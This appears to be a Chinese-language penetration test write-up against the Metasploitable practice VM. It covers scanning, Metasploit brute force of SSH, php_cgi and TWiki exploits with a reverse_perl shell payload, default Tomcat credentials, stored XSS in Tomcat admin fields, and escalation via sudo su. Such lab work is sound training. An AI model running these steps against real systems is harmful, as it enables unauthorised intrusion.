Metasploitable渗透测试

Metasploitable靶机渗透测试报告

1. 信息收集

2. 主机探测

• 使用arp-scan -l发现目标靶机的IP地址是192.168.5.135

arp-scan -l

1. 端口扫描

• 使用nmap -sS -sV -sC -p- 192.168.5.135发现目标靶机开启了：21，22，23，25，53，80，139，445，3306，5432，8009，8180端口。

nmap -sS -sV -sC -p- 192.168.5.135

1. 目录扫描

• 使用 dirb ``http://192.168.5.135/ 扫描目标IP目录。

dirb http://192.168.5.135/

• 使用dirb ``http://192.168.11.13``5：8180扫描目标IP目录。

dirb http://192.168.11.135：8180

1. 渗透阶段

2. 21端口的FTP服务

用版本号看看有没有漏洞

除了1.3.1其他都有我服了

1. 22端口的SSH服务

网上搜索扫描发现是有漏洞的

用msfconsle进一步探测

search ssh_login

• 这里我们选择模块0进行暴力破解。

use 0

• 之后配置好域名，账号密码字典以及线程数即可。

set RHOST 192.168.5.135
set USERPASS_FILE /usr/share/wordlists/rockyou.txt
set USER_FILE /usr/share/wordlists/metasploit/unix_users.txt

• 开始运行，可以看到成功地拿到了连接的账号密码。

1. 23端口的Telnet服务

用 msfconsole 扫描漏洞

用这个漏洞模块

其实是可以知道默认账密的，网上能扫到，但是还是选择暴力破解

使用 telnet 连接

telnet 192.168.5.135

1. 80端口的 phpinfo 文件

在网上可以搜到这个版本的 php 有远程代码连接漏洞

在 msfconsole 里面搜索

search php_cgi

使用第一个也就是 use 0

使用攻击模块，做好配置

set rhost 192.168.5.135
run

2.5 80端口的 Twiki

在 msfconsole 中搜索它的 nday

用 search Twiki

发现第二个可能是我们可以用到的

use 1
show options

然后配置我们的攻击模块

set rhost 192.168.5.135
set payload /cmd/unix/reverse_perl
run

1. 8180端口的Apache服务

8180的Apache服务我们可以通过暴力破解获得账号密码

账密都为 tomcat

就可以登录到管理员页面

1. Mail Sessions的存储型XSS（1个）

• 新建一个Mail Session，在内容里面植入XSS恶意代码。

• 成功弹窗。

1. Environment Entries的存储型XSS（2个）

• 新建一个Environment Entries，在内容里面植入XSS恶意代码。

• 成功弹窗。

1. User Databases的存储型XSS（1个）

• 编辑已有的User Databases，在内容里面植入XSS恶意代码。

• 成功弹窗。

1. Users的存储型XSS

• 可以编辑已有的用户或者新建用户，编辑它们的Full Name选项，在其中植入XSS恶意代码。

• 成功弹窗。

1. Groups的存储型XS

• 创建新的Groups，组名（Group Name）和描述（Description）栏都可以插入XSS恶意代码。

• 成功弹窗。

1. Roles的存储型XSS

• 创建新的规则，其中规则名（Role Name）和描述（Description）栏都可以植入XSS恶意代码，或者编辑已有用户的描述（Description）向其中植入XSS恶意代码。

• 成功弹窗。

1. 提权阶段

用刚刚 telnet 登录的地方提权

我们刚刚已经拿到了用户密码，所以这里直接切换成root用户就可以实现提权。

sudo su
id